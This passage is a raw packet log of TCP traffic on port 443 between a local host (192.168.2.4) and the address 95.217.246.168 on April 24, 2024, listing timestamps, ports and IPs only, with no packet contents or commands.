Apr 24, 2024 16:48:42.340356112 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.340395927 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.340562105 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.340563059 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.340631962 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.340691090 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.369555950 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.369613886 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.369705915 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.369781017 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.369826078 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.369851112 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.396274090 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.396317005 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.396523952 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.396547079 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.396615028 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.421164036 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.421207905 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.421328068 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.421329021 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.421399117 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.421453953 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.788945913 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.788975000 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.789021015 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.789042950 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.789109945 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.789132118 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.789155960 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.789189100 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.789205074 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.789226055 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.789237022 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.789269924 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.789305925 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.789371967 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.789412975 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.789442062 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.789454937 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.789480925 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.789504051 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.116632938 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.116681099 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.116760969 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.116769075 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.116828918 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.137075901 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.137119055 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.137192965 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.137202024 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.137232065 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.137263060 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.162631035 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.162672997 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.162739038 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.162744045 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.162911892 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.189462900 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.189522982 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.189558983 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.189584017 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.189600945 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.191442013 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.218020916 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.218075991 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.218108892 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.218130112 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.218147039 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.218173027 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.242818117 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.242846012 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.242892981 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.242919922 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.242937088 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.242960930 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.441186905 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.441257954 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.441328049 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.441346884 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.441394091 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.469711065 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.469777107 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.469846964 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.469854116 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.469883919 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.469923019 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.494831085 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.494889975 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.494934082 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.494937897 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.494996071 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.507493973 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.507535934 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.507580042 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.507585049 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.507611036 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.507639885 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.507673025 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.507719040 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.507740021 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.507745028 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.507785082 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.507810116 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.507857084 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.507879019 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.507883072 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.507910013 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.507931948 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.524034977 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.524081945 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.524266958 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.524272919 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.524326086 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.553107023 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.553158045 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.553210020 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.553219080 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:43.553250074 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:43.553275108 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:44.484405994 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:44.484448910 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:44.484498978 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:44.484507084 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:44.484528065 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:44.484550953 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:44.484555960 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:44.484566927 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:44.484586954 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:44.816620111 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:44.816634893 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:44.816668987 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:44.816726923 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:44.816741943 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:44.816766977 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:44.816792965 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:46.481919050 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:46.481956959 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:46.482014894 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:46.482109070 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:46.482136011 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:46.482151985 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:46.482156992 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:46.482182026 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:46.482187033 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:46.482207060 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:46.482213974 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:46.482234955 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:46.482239962 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:46.482266903 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:46.482291937 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:47.801213026 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:47.801270008 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:47.801318884 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:47.801343918 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:47.801361084 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:47.801429033 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:47.801434040 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:47.801481009 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:47.801548958 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:53.574110985 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.574129105 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.574181080 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.574354887 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:53.574354887 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:53.574383974 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.574438095 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:53.740226984 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.740267038 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.740309000 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:53.740319967 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.740345955 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:53.740360022 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:53.909456968 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.909497976 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.909575939 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:53.909588099 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:53.909603119 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:53.909619093 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.063445091 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.063473940 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.063581944 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.063608885 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.063647985 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.216561079 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.216593027 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.216739893 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.216769934 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.216847897 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.350649118 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.350703001 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.350768089 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.350820065 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.350848913 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.350914001 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.485295057 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.485321045 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.485531092 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.485558987 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.485650063 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.615231991 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.615261078 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.615438938 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.615468025 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.615521908 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.745254040 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.745307922 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.745488882 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.745516062 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.745625019 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.892069101 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.892096043 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.892257929 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:54.892292023 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:54.892342091 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.017951965 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.017987967 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.018043041 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.018068075 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.018080950 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.018112898 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.150824070 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.150896072 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.151106119 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.151106119 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.151139975 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.151190996 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.283479929 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.283504963 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.283689022 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.283706903 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.283760071 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.420176983 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.420202017 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.420311928 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.420341015 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.420388937 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.549350023 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.549449921 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.549460888 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.549479008 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.549513102 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.549534082 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.671588898 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.671621084 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.671782970 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.671809912 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.671854019 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.804569960 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.804599047 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.804728985 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.804761887 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.804817915 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.939150095 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.939186096 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.939249039 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:55.939270973 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:55.939318895 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.069976091 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.070000887 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.070123911 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.070139885 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.070194006 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.202656031 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.202682018 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.202763081 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.202788115 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.202841043 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.276643991 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.276669979 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.276844978 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.276860952 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.276906013 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.355904102 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.355927944 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.356057882 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.356075048 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.356108904 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.356131077 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.478410959 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.478437901 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.478600025 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.478620052 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.478667021 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.498703957 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.498765945 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.498791933 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.498826027 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.499253035 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.499262094 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.499277115 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.499314070 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.580815077 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.580838919 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:56.580955982 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.581130028 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:56.581140041 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:57.241996050 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:57.242249012 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:57.243407965 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:57.243427038 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:57.262751102 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:57.262761116 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:57.262780905 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:57.262793064 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:57.684273005 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:57.684330940 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:57.684422016 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:57.684731960 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:57.684750080 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.339492083 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.339829922 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.340363026 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.340377092 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.342726946 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.342736959 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.342920065 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.342926979 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.403844118 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.403928041 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.403942108 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.403994083 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.404020071 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.404078960 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.405474901 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.405500889 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.831675053 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.831701994 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:58.831789017 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.832046986 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:58.832061052 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:59.489697933 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:59.489967108 CEST	49752	443	192.168.2.4	95.217.246.168
